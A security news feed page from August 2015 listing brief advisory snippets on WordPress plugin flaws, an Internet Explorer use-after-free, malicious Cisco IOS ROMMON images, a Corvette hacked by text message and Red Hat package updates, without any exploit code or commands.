Debian Linux Security Advisory 3332-1 – Several vulnerabilities have been fixed in WordPress, the popular blogging engine.
Monthly Archives: August 2015
BFS-SA-2015-001: Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability
Posted by Blue Frost Security Research Lab on Aug 12
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/ research(at)bluefrostsecurity.de
BFS-SA-2015-001 12-August-2015
Re: Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plugin)
Posted by dxw Security on Aug 12
Ah yes – sorry about that. Should indeed be 2015-08-10
I’ve corrected in our published advisory:
https://security.dxw.com/advisories/xss-in-google-analytics-by-yoast-premium-by-privileged-users/
<https://security.dxw.com/advisories/xss-in-google-analytics-by-yoast-premium-by-privileged-users/>
Thanks for letting me know
—
Duncan Stuart (@dgmstuart)
Head of Products, dxw
Exemplary web projects for the public sector
The OAuth2 Complete plugin for WordPress uses a pseudorandom number generator which is non-cryptographically secure (WordPress plugin)
Posted by dxw Security on Aug 12
Details
================
Software: OAuth2 Complete For WordPress
Version: 3.1.3
Homepage: http://wordpress.org/plugins/oauth2-provider/
Advisory report:
https://security.dxw.com/advisories/the-oauth2-complete-plugin-for-wordpress-uses-a-pseudorandom-number-generator-which-is-non-cryptographically-secure/
CVE: Awaiting assignment
CVSS: 10 (High; AV:N/AC:L/Au:N/C:C/I:C/A:C)
Description
================
The OAuth2 Complete plugin for WordPress…
Open source tool for applying Google Chrome security updates
Posted by David Leo on Aug 12
The Problem
If you are a network administrator, keeping browser updated is the first thing to do for security. Chrome is a very
good browser, but it’s a little bit complicated to answer this simple question: what is the version of the latest
stable Chrome? And for people in places such as China(no Google services), updating Chrome is not an easy task.
The Solution
The official blog of Chrome Releases contains a lot of information. Code of…
Cisco Warns Customers About Attacks Installing Malicious IOS Bootstrap Images
Cisco is warning enterprise customers about a spike in attacks in which hackers use valid credentials on IOS devices to log in as administrators and then upload malicious ROMMON images to take control of the devices. The ROM Monitor is the program that initializes the hardware and software on IOS devices, and an attacker who […]
Evolution in Attacks Against Cisco IOS Software Platforms
Original release date: August 12, 2015
Cisco has observed increasingly complex attacks that could allow an attacker to gain administrative access to a Cisco IOS device by installing a malicious ROMMON image. Successful exploitation using this image could allow an attacker to manipulate device behavior after the device is rebooted.
US-CERT encourages users and administrators to review the Cisco Security Activity Bulletin and apply recommendations to protect Cisco IOS devices.
This product is provided subject to this Notification and this Privacy & Use policy.
Corvette hacked with a text message
Researchers have hacked into a Corvette with a simple text message, taking control over its brakes.
The post Corvette hacked with a text message appeared first on We Live Security.
RHBA-2015:1588-1: Red Hat OpenShift Enterprise 2.0.9 bug fix update
Red Hat Enterprise Linux: Red Hat OpenShift Enterprise release 2.0.9 is now available with updated
packages that fix several bugs.
RHEA-2015:1600-1: new packages: kmod-iwlwifi
Red Hat Enterprise Linux: New kmod-iwlwifi packages are now available for Red Hat Enterprise Linux 6.